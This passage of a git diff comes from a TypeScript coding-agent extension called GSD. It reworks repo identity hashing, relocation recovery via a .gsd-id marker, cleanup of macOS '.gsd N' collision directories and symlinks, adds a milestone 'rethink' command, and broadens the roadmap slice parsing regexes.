@@ -188,13 +208,41 @@ export async function loadSliceTaskIO(
   const planContent = slicePlanPath ? await loadFile(slicePlanPath) : null;
   if (!planContent) return [];
 
-  const plan = parsePlan(planContent);
+  // DB primary path — get task entries
+  let taskEntries: { id: string; title: string; done: boolean }[] | null = null;
+  try {
+    if (isDbAvailable()) {
+      const tasks = getSliceTasks(mid, sid);
+      if (tasks.length > 0) {
+        taskEntries = tasks.map(t => ({
+          id: t.id,
+          title: t.title,
+          done: t.status === "complete" || t.status === "done",
+        }));
+      }
+    }
+  } catch { /* fall through */ }
+
+  if (!taskEntries) {
+    // File-based fallback: parse slice plan for task entries
+    const parsed = parsePlan(planContent);
+    if (parsed.tasks.length > 0) {
+      taskEntries = parsed.tasks.map(t => ({
+        id: t.id,
+        title: t.title,
+        done: t.done,
+      }));
+    } else {
+      return [];
+    }
+  }
+
   const tDir = resolveTasksDir(basePath, mid, sid);
   if (!tDir) return [];
 
   const results: TaskIO[] = [];
 
-  for (const taskEntry of plan.tasks) {
+  for (const taskEntry of taskEntries) {
     const planFiles = resolveTaskFiles(tDir, "PLAN");
     const taskFileName = planFiles.find((f) =>
       f.toUpperCase().startsWith(taskEntry.id.toUpperCase() + "-"),
diff --git a/src/resources/extensions/gsd/repo-identity.ts b/src/resources/extensions/gsd/repo-identity.ts
index d3133c3d6..8de304f36 100644
--- a/src/resources/extensions/gsd/repo-identity.ts
+++ b/src/resources/extensions/gsd/repo-identity.ts
@@ -8,7 +8,7 @@
 
 import { createHash } from "node:crypto";
 import { execFileSync } from "node:child_process";
-import { existsSync, lstatSync, mkdirSync, readFileSync, realpathSync, rmSync, symlinkSync, writeFileSync } from "node:fs";
+import { cpSync, existsSync, lstatSync, mkdirSync, readdirSync, readFileSync, realpathSync, renameSync, rmSync, symlinkSync, unlinkSync, writeFileSync } from "node:fs";
 import { homedir } from "node:os";
 import { basename, dirname, join, resolve } from "node:path";
 
@@ -104,16 +104,17 @@ export function readRepoMeta(externalPath: string): RepoMeta | null {
  * Returns true when ALL of:
  *   1. basePath is inside a git repo (git rev-parse succeeds)
  *   2. The resolved git root is a proper ancestor of basePath
- *   3. There is no `.gsd` directory at the git root (the parent project
- *      has not been initialised with GSD)
+ *   3. There is no *project* `.gsd` directory at the git root or any
+ *      intermediate ancestor (the parent project has not been
+ *      initialised with GSD)
  *
  * When true, the caller should run `git init` at basePath so that
  * `repoIdentity()` produces a hash unique to this directory, preventing
  * cross-project state leaks (#1639).
  *
- * When the git root already has `.gsd`, the directory is a legitimate
- * subdirectory of an existing GSD project — `cd src/ && /gsd` should
- * still load the parent project's milestones.
+ * When the git root already has a project `.gsd`, the directory is a
+ * legitimate subdirectory of an existing GSD project — `cd src/ && /gsd`
+ * should still load the parent project's milestones.
  */
 export function isInheritedRepo(basePath: string): boolean {
   try {
@@ -124,12 +125,15 @@ export function isInheritedRepo(basePath: string): boolean {
 
     // The git root is a proper ancestor. Check whether it already has .gsd
     // (i.e. the parent project was initialised with GSD).
-    if (existsSync(join(root, ".gsd"))) return false;
+    if (isProjectGsd(join(root, ".gsd"))) return false;
 
-    // Also walk up from basePath to the git root checking for .gsd
-    let dir = normalizedBase;
+    // Walk up from basePath's parent to the git root checking for .gsd.
+    // Start at dirname(normalizedBase), NOT normalizedBase itself — finding
+    // .gsd at basePath means GSD state is set up for THIS project, which
+    // says nothing about whether the git repo is inherited from an ancestor.
+    let dir = dirname(normalizedBase);
     while (dir !== normalizedRoot && dir !== dirname(dir)) {
-      if (existsSync(join(dir, ".gsd"))) return false;
+      if (isProjectGsd(join(dir, ".gsd"))) return false;
       dir = dirname(dir);
     }
 
@@ -139,6 +143,44 @@ export function isInheritedRepo(basePath: string): boolean {
   }
 }
 
+/**
+ * Distinguish a *project* `.gsd` from the global `~/.gsd` state directory.
+ *
+ * A project `.gsd` is either:
+ *   - A symlink to an external state directory (normal post-migration layout)
+ *   - A legacy real directory that is NOT the global GSD home
+ *
+ * When the user's home directory is itself a git repo (e.g. dotfile managers),
+ * `~/.gsd` exists but is the global state directory — not a project `.gsd`.
+ * Treating it as a project `.gsd` would cause isInheritedRepo() to wrongly
+ * conclude that subdirectories are part of the home "project" (#2393).
+ */
+function isProjectGsd(gsdPath: string): boolean {
+  if (!existsSync(gsdPath)) return false;
+
+  try {
+    const stat = lstatSync(gsdPath);
+
+    // Symlinks are always project .gsd (created by ensureGsdSymlink).
+    if (stat.isSymbolicLink()) return true;
+
+    // For real directories, check that this isn't the global GSD home.
+    // Recompute gsdHome dynamically so env overrides (GSD_HOME) are
+    // picked up at call time, not just at module load time.
+    if (stat.isDirectory()) {
+      const currentGsdHome = process.env.GSD_HOME || join(homedir(), ".gsd");
+      const normalizedGsdPath = canonicalizeExistingPath(gsdPath);
+      const normalizedGsdHome = canonicalizeExistingPath(currentGsdHome);
+      if (normalizedGsdPath === normalizedGsdHome) return false;
+      return true;
+    }
+  } catch {
+    // lstat failed — treat as no .gsd present
+  }
+
+  return false;
+}
+
 // ─── Repo Identity ──────────────────────────────────────────────────────────
 
 /**
@@ -234,9 +276,14 @@ export function validateProjectId(id: string): boolean {
  * If `GSD_PROJECT_ID` is set, returns it directly (validation is expected
  * to have already happened at startup via `validateProjectId`).
  *
- * Otherwise returns SHA-256 of `${remoteUrl}\n${resolvedRoot}`, truncated
- * to 12 hex chars. Deterministic: same repo always produces the same hash
- * regardless of which worktree the caller is inside.
+ * For repos with a remote URL, returns SHA-256 of the remote URL only —
+ * this makes the identity stable across directory moves/renames (#2750).
+ *
+ * For local-only repos (no remote), includes the git root in the hash.
+ * Local repos use a `.gsd-id` marker file for recovery after moves.
+ *
+ * Deterministic: same repo always produces the same hash regardless of
+ * which worktree the caller is inside.
  */
 export function repoIdentity(basePath: string): string {
   const projectId = process.env.GSD_PROJECT_ID;
@@ -244,8 +291,14 @@ export function repoIdentity(basePath: string): string {
     return projectId;
   }
   const remoteUrl = getRemoteUrl(basePath);
+  if (remoteUrl) {
+    // Remote URL alone uniquely identifies the repo — path is redundant.
+    // This makes moves transparent for repos with remotes (#2750).
+    return createHash("sha256").update(remoteUrl).digest("hex").slice(0, 12);
+  }
+  // Local-only repo: include git root since there's no remote to anchor identity.
   const root = resolveGitRoot(basePath);
-  const input = `${remoteUrl}\n${root}`;
+  const input = `\n${root}`;
   return createHash("sha256").update(input).digest("hex").slice(0, 12);
 }
 
@@ -271,20 +324,186 @@ export function externalProjectsRoot(): string {
   return join(base, "projects");
 }
 
+// ─── Numbered Variant Cleanup ────────────────────────────────────────────────
+
+/**
+ * macOS collision pattern: `.gsd 2`, `.gsd 3`, `.gsd 4`, etc.
+ *
+ * When `symlinkSync` (or Finder) tries to create `.gsd` but a real directory
+ * already exists at that path, macOS APFS silently renames the new entry to
+ * `.gsd 2`, then `.gsd 3`, and so on. These numbered variants confuse GSD
+ * because the canonical `.gsd` path no longer resolves to the external state
+ * directory, making tracked planning files appear deleted.
+ *
+ * This helper scans the project root for entries matching `.gsd <digits>` and
+ * removes them. It is called early in `ensureGsdSymlink()` so that the
+ * canonical `.gsd` path is always the one in use.
+ */
+const GSD_NUMBERED_VARIANT_RE = /^\.gsd \d+$/;
+
+export function cleanNumberedGsdVariants(projectPath: string): string[] {
+  const removed: string[] = [];
+  try {
+    const entries = readdirSync(projectPath);
+    for (const entry of entries) {
+      if (GSD_NUMBERED_VARIANT_RE.test(entry)) {
+        const fullPath = join(projectPath, entry);
+        try {
+          rmSync(fullPath, { recursive: true, force: true });
+          removed.push(entry);
+        } catch {
+          // Best-effort: if removal fails (e.g. permissions), continue with next
+        }
+      }
+    }
+  } catch {
+    // Non-fatal: readdir failure should not block symlink creation
+  }
+  return removed;
+}
+
+// ─── .gsd-id Marker ─────────────────────────────────────────────────────────
+
+/**
+ * Write a `.gsd-id` marker file in the project root.
+ *
+ * This file records the identity hash used for the external state directory.
+ * For local-only repos (no remote), this marker survives directory moves and
+ * enables automatic recovery of orphaned state (#2750).
+ *
+ * The marker is gitignored by ensureGitignore(). Non-fatal: failure to write
+ * the marker must never block project setup.
+ */
+function writeGsdIdMarker(projectPath: string, identity: string): void {
+  try {
+    const markerPath = join(projectPath, ".gsd-id");
+    // Only write if content differs to avoid unnecessary disk writes.
+    if (existsSync(markerPath)) {
+      try {
+        if (readFileSync(markerPath, "utf-8").trim() === identity) return;
+      } catch { /* fall through and overwrite */ }
+    }
+    writeFileSync(markerPath, identity + "\n", "utf-8");
+  } catch {
+    // Non-fatal — marker write failure should not block project setup
+  }
+}
+
+/**
+ * Read the `.gsd-id` marker from the project root.
+ * Returns the identity hash, or null if the marker doesn't exist or is unreadable.
+ */
+function readGsdIdMarker(projectPath: string): string | null {
+  try {
+    const markerPath = join(projectPath, ".gsd-id");
+    if (!existsSync(markerPath)) return null;
+    const content = readFileSync(markerPath, "utf-8").trim();
+    return /^[a-zA-Z0-9_-]+$/.test(content) ? content : null;
+  } catch {
+    return null;
+  }
+}
+
+/**
+ * Check whether an external state directory has meaningful content.
+ * Returns true if the directory contains any files or subdirectories
+ * beyond just repo-meta.json.
+ */
+function hasProjectState(externalPath: string): boolean {
+  try {
+    if (!existsSync(externalPath)) return false;
+    const entries = readdirSync(externalPath);
+    return entries.some(e => e !== "repo-meta.json");
+  } catch {
+    return false;
+  }
+}
+
+/**
+ * Resolve the external state directory, with recovery for relocated projects.
+ *
+ * For local-only repos where the computed identity produces an empty state dir,
+ * checks the `.gsd-id` marker for the original identity hash and recovers
+ * the old state directory if it still exists and contains data (#2750).
+ *
+ * Returns the resolved external path (may differ from the computed identity).
+ */
+function resolveExternalPathWithRecovery(projectPath: string): string {
+  const computedPath = externalGsdRoot(projectPath);
+  const computedId = repoIdentity(projectPath);
+
+  // Check if computed path already has state — fast path, no recovery needed.
+  if (hasProjectState(computedPath)) {
+    return computedPath;
+  }
+
+  // Check for .gsd-id marker from a previous location.
+  const markerId = readGsdIdMarker(projectPath);
+  if (markerId && markerId !== computedId) {
+    // The marker points to a different identity — the repo was likely moved.
+    const base = process.env.GSD_STATE_DIR || gsdHome;
+    const markerPath = join(base, "projects", markerId);
+    if (hasProjectState(markerPath)) {
+      // Recover: use the old state directory and update the marker to the new identity.
+      // Move the state from the old hash dir to the new one so future lookups work
+      // without the marker.
+      try {
+        mkdirSync(computedPath, { recursive: true });
+        const entries = readdirSync(markerPath);
+        for (const entry of entries) {
+          try {
+            const src = join(markerPath, entry);
+            const dst = join(computedPath, entry);
+            // Use rename for same-filesystem (fast) or fall back to copy.
+            try {
+              renameSync(src, dst);
+            } catch {
+              cpSync(src, dst, { recursive: true, force: true });
+            }
+          } catch { /* continue with remaining entries */ }
+        }
+        // Clean up old directory after successful migration.
+        try { rmSync(markerPath, { recursive: true, force: true }); } catch { /* non-fatal */ }
+      } catch {
+        // If migration fails, just point at the old directory.
+        return markerPath;
+      }
+    }
+  }
+
+  return computedPath;
+}
+
 // ─── Symlink Management ─────────────────────────────────────────────────────
 
 /**
  * Ensure the `<project>/.gsd` symlink points to the external state directory.
  *
- * 1. mkdir -p the external dir
- * 2. If `<project>/.gsd` doesn't exist → create symlink
- * 3. If `<project>/.gsd` is already the correct symlink → no-op
- * 4. If `<project>/.gsd` is a real directory → return as-is (migration handles later)
+ * 1. Clean up any macOS numbered collision variants (`.gsd 2`, `.gsd 3`, etc.)
+ * 2. Resolve external dir (with relocation recovery via `.gsd-id` marker)
+ * 3. mkdir -p the external dir
+ * 4. If `<project>/.gsd` doesn't exist → create symlink
+ * 5. If `<project>/.gsd` is already the correct symlink → no-op
+ * 6. If `<project>/.gsd` is a real directory → return as-is (migration handles later)
+ * 7. Write `.gsd-id` marker for future relocation recovery
  *
  * Returns the resolved external path.
  */
 export function ensureGsdSymlink(projectPath: string): string {
-  const externalPath = externalGsdRoot(projectPath);
+  const result = ensureGsdSymlinkCore(projectPath);
+
+  // Write .gsd-id marker so future relocations can recover this state (#2750).
+  // Only write for the project root (not subdirectories or worktrees that
+  // delegate to a parent .gsd).
+  if (!isInsideWorktree(projectPath)) {
+    writeGsdIdMarker(projectPath, repoIdentity(projectPath));
+  }
+
+  return result;
+}
+
+function ensureGsdSymlinkCore(projectPath: string): string {
+  const externalPath = resolveExternalPathWithRecovery(projectPath);
   const localGsd = join(projectPath, ".gsd");
   const inWorktree = isInsideWorktree(projectPath);
 
@@ -297,6 +516,38 @@ export function ensureGsdSymlink(projectPath: string): string {
     return localGsd;
   }
 
+  // Guard: If projectPath is a plain subdirectory (not a worktree) of a git
+  // repo that already has a .gsd at the git root, do not create a duplicate
+  // symlink in the subdirectory — that causes `.gsd 2` collision variants on
+  // macOS (#2380). Worktrees are excluded because they legitimately need their
+  // own .gsd symlink pointing at the shared external state dir.
+  if (!inWorktree) {
+    try {
+      const gitRoot = resolveGitRoot(projectPath);
+      const normalizedProject = canonicalizeExistingPath(projectPath);
+      const normalizedRoot = canonicalizeExistingPath(gitRoot);
+      if (normalizedProject !== normalizedRoot) {
+        const rootGsd = join(gitRoot, ".gsd");
+        if (existsSync(rootGsd)) {
+          try {
+            const rootStat = lstatSync(rootGsd);
+            if (rootStat.isSymbolicLink() || rootStat.isDirectory()) {
+              return rootStat.isSymbolicLink() ? realpathSync(rootGsd) : rootGsd;
+            }
+          } catch {
+            // Fall through to normal logic if we can't stat root .gsd
+          }
+        }
+      }
+    } catch {
+      // If git root detection fails, fall through to normal logic
+    }
+  }
+
+  // Clean up macOS numbered collision variants (.gsd 2, .gsd 3, etc.) before
+  // any existence checks — otherwise they accumulate and confuse state (#2205).
+  cleanNumberedGsdVariants(projectPath);
+
   // Ensure external directory exists
   mkdirSync(externalPath, { recursive: true });
 
@@ -305,12 +556,28 @@ export function ensureGsdSymlink(projectPath: string): string {
 
   const replaceWithSymlink = (): string => {
     rmSync(localGsd, { recursive: true, force: true });
+    // Defensive: remove any residual entry (e.g. dangling symlink) before creating.
+    try { unlinkSync(localGsd); } catch { /* already gone */ }
     symlinkSync(externalPath, localGsd, "junction");
     return externalPath;
   };
 
+  // Check for dangling symlinks (e.g. after relocation recovery removed the old
+  // state dir). existsSync follows symlinks, so it returns false for dangling ones.
+  // lstatSync does NOT follow, so we can detect the dangling symlink and replace it.
   if (!existsSync(localGsd)) {
-    // Nothing exists yet — create symlink
+    try {
+      const stat = lstatSync(localGsd);
+      if (stat.isSymbolicLink()) {
+        // Dangling symlink — replace with correct one (#2750).
+        return replaceWithSymlink();
+      }
+    } catch {
+      // lstat also failed — nothing exists at this path
+    }
+    // Nothing exists yet — create symlink.
+    // Defensive: remove any residual entry to avoid EEXIST race (#2750).
+    try { unlinkSync(localGsd); } catch { /* nothing to remove */ }
     symlinkSync(externalPath, localGsd, "junction");
     return externalPath;
   }
@@ -329,6 +596,27 @@ export function ensureGsdSymlink(projectPath: string): string {
       if (inWorktree) {
         return replaceWithSymlink();
       }
+      // After identity hash change (e.g. upgrade from path-based to remote-only
+      // hash, or relocation recovery), migrate data from old target to new path
+      // and update the symlink (#2750).
+      if (!hasProjectState(externalPath) && hasProjectState(target)) {
+        try {
+          mkdirSync(externalPath, { recursive: true });
+          const oldEntries = readdirSync(target);
+          for (const entry of oldEntries) {
+            try {
+              const src = join(target, entry);
+              const dst = join(externalPath, entry);
+              try { renameSync(src, dst); } catch { cpSync(src, dst, { recursive: true, force: true }); }
+            } catch { /* continue */ }
+          }
+          try { rmSync(target, { recursive: true, force: true }); } catch { /* non-fatal */ }
+          return replaceWithSymlink();
+        } catch {
+          // Migration failed — preserve old symlink
+          return target;
+        }
+      }
       // Outside worktrees, preserve custom overrides or legacy symlinks.
       return target;
     }
diff --git a/src/resources/extensions/gsd/resource-version.ts b/src/resources/extensions/gsd/resource-version.ts
deleted file mode 100644
index cba47b30f..000000000
--- a/src/resources/extensions/gsd/resource-version.ts
+++ /dev/null
@@ -1,101 +0,0 @@
-/**
- * Resource version tracking and stale worktree detection.
- *
- * Staleness detection for managed GSD resources and utilities
- * for escaping stale worktree cwd after milestone teardown.
- */
-
-import { existsSync, readdirSync, unlinkSync } from "node:fs";
-import { loadJsonFileOrNull } from "./json-persistence.js";
-import { join } from "node:path";
-import { homedir } from "node:os";
-import { resolveProjectRoot } from "./worktree.js";
-
-const gsdHome = process.env.GSD_HOME || join(homedir(), ".gsd");
-
-// ─── Resource Staleness ───────────────────────────────────────────────────
-
-/**
- * Read the resource version (semver) from the managed-resources manifest.
- * Uses gsdVersion instead of syncedAt so that launching a second session
- * doesn't falsely trigger staleness (#804).
- */
-function isManifestWithVersion(data: unknown): data is { gsdVersion: string } {
-  return data !== null && typeof data === "object" && "gsdVersion" in data! && typeof (data as Record<string, unknown>).gsdVersion === "string";
-}
-
-export function readResourceVersion(): string | null {
-  const agentDir = process.env.GSD_CODING_AGENT_DIR || join(gsdHome, "agent");
-  const manifestPath = join(agentDir, "managed-resources.json");
-  const manifest = loadJsonFileOrNull(manifestPath, isManifestWithVersion);
-  return manifest?.gsdVersion ?? null;
-}
-
-/**
- * Check if managed resources have been updated since session start.
- * Returns a warning message if stale, null otherwise.
- */
-export function checkResourcesStale(versionOnStart: string | null): string | null {
-  if (versionOnStart === null) return null;
-  const current = readResourceVersion();
-  if (current === null) return null;
-  if (current !== versionOnStart) {
-    return "GSD resources were updated since this session started. Restart gsd to load the new code.";
-  }
-  return null;
-}
-
-// ─── Stale Worktree Escape ────────────────────────────────────────────────
-
-/**
- * Detect and escape a stale worktree cwd (#608).
- *
- * After milestone completion + merge, the worktree directory is removed but
- * the process cwd may still point inside `.gsd/worktrees/<MID>/`.
- * When a new session starts, `process.cwd()` is passed as `base` to startAuto
- * and all subsequent writes land in the wrong directory. This function detects
- * that scenario and chdir back to the project root.
- *
- * Returns the corrected base path.
- */
-export function escapeStaleWorktree(base: string): string {
-  const projectRoot = resolveProjectRoot(base);
-  if (projectRoot === base) return base;
-  try {
-    process.chdir(projectRoot);
-  } catch {
-    return base;
-  }
-  return projectRoot;
-}
-
-/**
- * Clean stale runtime unit files for completed milestones.
- *
- * After restart, stale runtime/units/*.json from prior milestones can
- * cause deriveState to resume the wrong milestone (#887). Removes files
- * for milestones that have a SUMMARY (fully complete).
- */
-export function cleanStaleRuntimeUnits(
-  gsdRootPath: string,
-  hasMilestoneSummary: (mid: string) => boolean,
-): number {
-  const runtimeUnitsDir = join(gsdRootPath, "runtime", "units");
-  if (!existsSync(runtimeUnitsDir)) return 0;
-
-  let cleaned = 0;
-  try {
-    for (const file of readdirSync(runtimeUnitsDir)) {
-      if (!file.endsWith(".json")) continue;
-      const midMatch = file.match(/(M\d+(?:-[a-z0-9]{6})?)/);
-      if (!midMatch) continue;
-      if (hasMilestoneSummary(midMatch[1])) {
-        try {
-          unlinkSync(join(runtimeUnitsDir, file));
-          cleaned++;
-        } catch { /* non-fatal */ }
-      }
-    }
-  } catch { /* non-fatal */ }
-  return cleaned;
-}
diff --git a/src/resources/extensions/gsd/rethink.ts b/src/resources/extensions/gsd/rethink.ts
new file mode 100644
index 000000000..1f7d3e0dd
--- /dev/null
+++ b/src/resources/extensions/gsd/rethink.ts
@@ -0,0 +1,163 @@
+/**
+ * GSD Rethink — Conversational project reorganization.
+ *
+ * Collects a snapshot of all milestones (status, dependencies, slice progress,
+ * queue order) and dispatches a prompt that turns Claude into a reorganization
+ * assistant. Claude can then reorder, park, unpark, discard, or add milestones
+ * through conversation.
+ */
+
+import type { ExtensionAPI, ExtensionCommandContext } from "@gsd/pi-coding-agent";
+import { existsSync } from "node:fs";
+
+import { isAutoActive } from "./auto.js";
+import { deriveState } from "./state.js";
+import { gsdRoot } from "./paths.js";
+import { findMilestoneIds } from "./milestone-ids.js";
+import { loadQueueOrder, validateQueueOrder } from "./queue-order.js";
+import { isParked, getParkedReason } from "./milestone-actions.js";
+import { getMilestoneSlices, isDbAvailable } from "./gsd-db.js";
+import { buildExistingMilestonesContext } from "./guided-flow-queue.js";
+import { loadPrompt } from "./prompt-loader.js";
+import { isGsdGitignored } from "./gitignore.js";
+
+// ─── Entry Point ──────────────────────────────────────────────────────────────
+
+export async function handleRethink(
+  _args: string,
+  ctx: ExtensionCommandContext,
+  pi: ExtensionAPI,
+): Promise<void> {
+  if (isAutoActive()) {
+    ctx.ui.notify("Cannot rethink while auto-mode is active. Stop auto-mode first.", "error");
+    return;
+  }
+
+  const basePath = process.cwd();
+  const root = gsdRoot(basePath);
+  if (!existsSync(root)) {
+    ctx.ui.notify("No GSD project found. Run /gsd init first.", "warning");
+    return;
+  }
+
+  ctx.ui.notify("Building project snapshot for rethink...", "info");
+
+  const state = await deriveState(basePath);
+  const milestoneIds = findMilestoneIds(basePath);
+
+  if (milestoneIds.length === 0) {
+    ctx.ui.notify("No milestones exist yet. Nothing to rethink.", "warning");
+    return;
+  }
+
+  const queueOrder = loadQueueOrder(basePath);
+  const rethinkData = buildRethinkData(basePath, milestoneIds, state, queueOrder);
+  const existingMilestonesContext = await buildExistingMilestonesContext(basePath, milestoneIds, state);
+
+  const commitInstruction = isGsdGitignored(basePath)
+    ? "Do not commit planning artifacts — .gsd/ is gitignored in this project."
+    : 'After changes, run `git add .gsd/ && git commit -m "docs(gsd): rethink milestone plan"` to persist (rethink runs interactively outside auto-mode, so no system auto-commit)';
+
+  const content = loadPrompt("rethink", {
+    rethinkData,
+    existingMilestonesContext,
+    commitInstruction,
+  });
+
+  pi.sendMessage(
+    { customType: "gsd-rethink", content, display: false },
+    { triggerTurn: true },
+  );
+}
+
+// ─── Data Builder ─────────────────────────────────────────────────────────────
+
+function buildRethinkData(
+  basePath: string,
+  milestoneIds: string[],
+  state: Awaited<ReturnType<typeof deriveState>>,
+  queueOrder: string[] | null,
+): string {
+  const lines: string[] = [];
+  const dbAvailable = isDbAvailable();
+
+  // ── Summary stats ───────────────────────────────────────────────────
+  const counts = { complete: 0, active: 0, pending: 0, parked: 0 };
+  for (const entry of state.registry) {
+    if (entry.status in counts) counts[entry.status as keyof typeof counts]++;
+  }
+
+  lines.push("### Summary");
+  lines.push(`${counts.complete} complete, ${counts.active} active, ${counts.pending} pending, ${counts.parked} parked — ${milestoneIds.length} total`);
+  lines.push(`Queue order source: ${queueOrder ? "explicit QUEUE-ORDER.json" : "default numeric (by ID)"}`);
+  if (state.activeMilestone) {
+    lines.push(`Active milestone: ${state.activeMilestone}`);
+  }
+  lines.push("");
+
+  // ── Milestone table ─────────────────────────────────────────────────
+  lines.push("### Execution Order");
+  lines.push("");
+  lines.push("| # | ID | Title | Status | Dependencies | Slices |");
+  lines.push("|---|-----|-------|--------|--------------|--------|");
+
+  for (let i = 0; i < milestoneIds.length; i++) {
+    const mid = milestoneIds[i];
+    const entry = state.registry.find(m => m.id === mid);
+    const title = entry?.title ?? mid;
+    const status = entry?.status ?? "unknown";
+    const deps = entry?.dependsOn?.length ? entry.dependsOn.join(", ") : "—";
+
+    let sliceInfo = "—";
+    if (dbAvailable && status !== "complete") {
+      const slices = getMilestoneSlices(mid);
+      if (slices.length > 0) {
+        const done = slices.filter(s => s.status === "complete" || s.status === "done").length;
+        const skipped = slices.filter(s => s.status === "skipped").length;
+        sliceInfo = skipped > 0
+          ? `${done}/${slices.length} complete, ${skipped} skipped`
+          : `${done}/${slices.length} complete`;
+      }
+    }
+
+    // Add parked reason if applicable
+    let statusDisplay = status;
+    if (status === "parked") {
+      const reason = getParkedReason(basePath, mid);
+      if (reason) statusDisplay = `parked (${reason})`;
+    }
+
+    lines.push(`| ${i + 1} | ${mid} | ${title} | ${statusDisplay} | ${deps} | ${sliceInfo} |`);
+  }
+
+  // ── Dependency validation ───────────────────────────────────────────
+  const pendingIds = milestoneIds.filter(mid => {
+    const entry = state.registry.find(m => m.id === mid);
+    return entry?.status !== "complete";
+  });
+
+  const completedIds = new Set(
+    state.registry.filter(m => m.status === "complete").map(m => m.id),
+  );
+
+  const depsMap = new Map<string, string[]>();
+  for (const entry of state.registry) {
+    if (entry.dependsOn?.length) {
+      depsMap.set(entry.id, entry.dependsOn);
+    }
+  }
+
+  if (pendingIds.length > 0 && depsMap.size > 0) {
+    const validation = validateQueueOrder(pendingIds, depsMap, completedIds);
+
+    if (validation.violations.length > 0) {
+      lines.push("");
+      lines.push("### Dependency Issues");
+      for (const v of validation.violations) {
+        lines.push(`- **${v.type}**: ${v.message}`);
+      }
+    }
+  }
+
+  return lines.join("\n");
+}
diff --git a/src/resources/extensions/gsd/roadmap-mutations.ts b/src/resources/extensions/gsd/roadmap-mutations.ts
index 39521462b..251c315a9 100644
--- a/src/resources/extensions/gsd/roadmap-mutations.ts
+++ b/src/resources/extensions/gsd/roadmap-mutations.ts
@@ -39,7 +39,7 @@ export function markSliceDoneInRoadmap(basePath: string, mid: string, sid: strin
       new RegExp(`^(#{1,4}\\s+(?:\\*{0,2})(?:Slice\\s+)?${sid}\\*{0,2}[:\\s.\\u2014\\u2013-]+\\s*)(.+)`, "m"),
       (match, prefix, title) => {
         // Already marked done — no-op
-        if (/^\u2713/.test(title) || /\(Complete\)\s*$/i.test(title)) return match;
+        if (/^[\u2713\u2705]/.test(title) || /[\u2705]\s*$/.test(title) || /\(Complete\)\s*$/i.test(title)) return match;
         return `${prefix}\u2713 ${title}`;
       },
     );
diff --git a/src/resources/extensions/gsd/roadmap-slices.ts b/src/resources/extensions/gsd/roadmap-slices.ts
index 4c4cb4ceb..33ec34b83 100644
--- a/src/resources/extensions/gsd/roadmap-slices.ts
+++ b/src/resources/extensions/gsd/roadmap-slices.ts
@@ -41,8 +41,8 @@ export function expandDependencies(deps: string[]): string[] {
 }
 
 function extractSlicesSection(content: string): string {
-  // Match "## Slices", "## Slice Overview", "## Slice Table", etc.
-  const headingMatch = /^## Slice(?:s| Overview| Table| Summary| Status)\b.*$/m.exec(content);
+  // Match "## Slices", "## Slice Overview", "## Slice Table", "## Slice Roadmap", etc.
+  const headingMatch = /^## Slice(?:s| Overview| Table| Summary| Status| Roadmap)\b.*$/m.exec(content);
   if (!headingMatch || headingMatch.index == null) return "";
 
   const start = headingMatch.index + headingMatch[0].length;
@@ -66,6 +66,17 @@ function parseTableSlices(section: string): RoadmapSliceEntry[] {
   const lines = section.split("\n");
   const slices: RoadmapSliceEntry[] = [];
 
+  // Detect dependency column index from the header row (#3383, #3336).
+  // Only parse deps from this column (or cells with explicit "depends"/"deps" keywords).
+  let depColumnIndex = -1;
+  for (const line of lines) {
+    if (!line.includes("|")) continue;
+    if (/S\d+/.test(line)) break; // reached data rows
+    const headerCells = line.split("|").map(c => c.trim()).filter(Boolean);
+    depColumnIndex = headerCells.findIndex(c => /^(depends|deps|depend)/i.test(c));
+    if (depColumnIndex >= 0) break;
+  }
+
   for (const line of lines) {
     // Skip non-table lines, separator lines (|---|---|), and header rows
     if (!line.includes("|")) continue;
@@ -82,6 +93,7 @@ function parseTableSlices(section: string): RoadmapSliceEntry[] {
     const fullRow = line.toLowerCase();
     const done =
       /\[x\]/i.test(line) ||
+      /[✅☑✓✔]/.test(line) ||
       /\bdone\b/.test(fullRow) ||
       /\bcomplete(?:d)?\b/.test(fullRow);
 
@@ -94,12 +106,17 @@ function parseTableSlices(section: string): RoadmapSliceEntry[] {
       if (/\bmedium\b/.test(cellLower) || /\bmed\b/.test(cellLower)) { risk = "medium"; break; }
     }
 
-    // Extract dependencies from cells containing S-prefixed IDs (excluding the slice's own ID)
+    // Extract dependencies only from the dependency column or cells with
+    // explicit "depends"/"deps" keywords — never from title cells (#3383).
     let depends: string[] = [];
-    for (const cell of cells) {
-      if (/depends|deps/i.test(cell) || (cell.match(/S\d+/g)?.length ?? 0) > 0) {
-        const depIds = (cell.match(/S\d+/g) ?? []).filter(d => d !== id);
-        if (depIds.length > 0 || /none|—|-/i.test(cell)) {
+    if (depColumnIndex >= 0 && cells[depColumnIndex]) {
+      const depCell = cells[depColumnIndex]!;
+      const depIds = (depCell.match(/S\d+/g) ?? []).filter(d => d !== id);
+      depends = expandDependencies(depIds);
+    } else {
+      for (const cell of cells) {
+        if (/depends|deps/i.test(cell)) {
+          const depIds = (cell.match(/S\d+/g) ?? []).filter(d => d !== id);
           depends = expandDependencies(depIds);
           break;
         }
@@ -218,13 +235,14 @@ export function parseRoadmapSlices(content: string): RoadmapSliceEntry[] {
 function parseProseSliceHeaders(content: string): RoadmapSliceEntry[] {
   const slices: RoadmapSliceEntry[] = [];
   // Match H1-H4 headers containing S<digits> with optional "Slice" prefix, bold markers,
-  // and optional checkmark completion marker before the slice ID.
+  // numeric prefixes (e.g., "1.", "(1)"), bracketed IDs (e.g., "[S01]"),
+  // optional checkmark completion marker, and optional leading indentation.
   // Separator after the ID is flexible: colon, dash, em/en dash, dot, or just whitespace.
-  const headerPattern = /^#{1,4}\s+\*{0,2}(?:\u2713\s+)?(?:Slice\s+)?(S\d+)\*{0,2}[:\s.\u2014\u2013-]*\s*(.+)/gm;
+  const headerPattern = /^\s*#{1,4}\s+\*{0,2}(?:[\u2713\u2705]\s+)?(?:\d+[.)]\s+)?(?:\(\d+\)\s+)?(?:Slice\s+)?\[?(S\d+)\]?\*{0,2}[:\s.\u2014\u2013-]*\s*(.+)/gm;
   let match: RegExpExecArray | null;
 
   // Check for checkmark before the slice ID (e.g., "## checkmark S01: Title")
-  const prefixCheckPattern = /^#{1,4}\s+\*{0,2}\u2713\s+/;
+  const prefixCheckPattern = /^\s*#{1,4}\s+\*{0,2}[\u2713\u2705]\s+/;
 
   while ((match = headerPattern.exec(content)) !== null) {
     const id = match[1]!;
@@ -238,9 +256,14 @@ function parseProseSliceHeaders(content: string): RoadmapSliceEntry[] {
     const line = match[0];
     let done = prefixCheckPattern.test(line);
 
-    if (!done && title.startsWith("\u2713")) {
+    if (!done && /^[\u2713\u2705]/.test(title)) {
       done = true;
-      title = title.replace(/^\u2713\s*/, "");
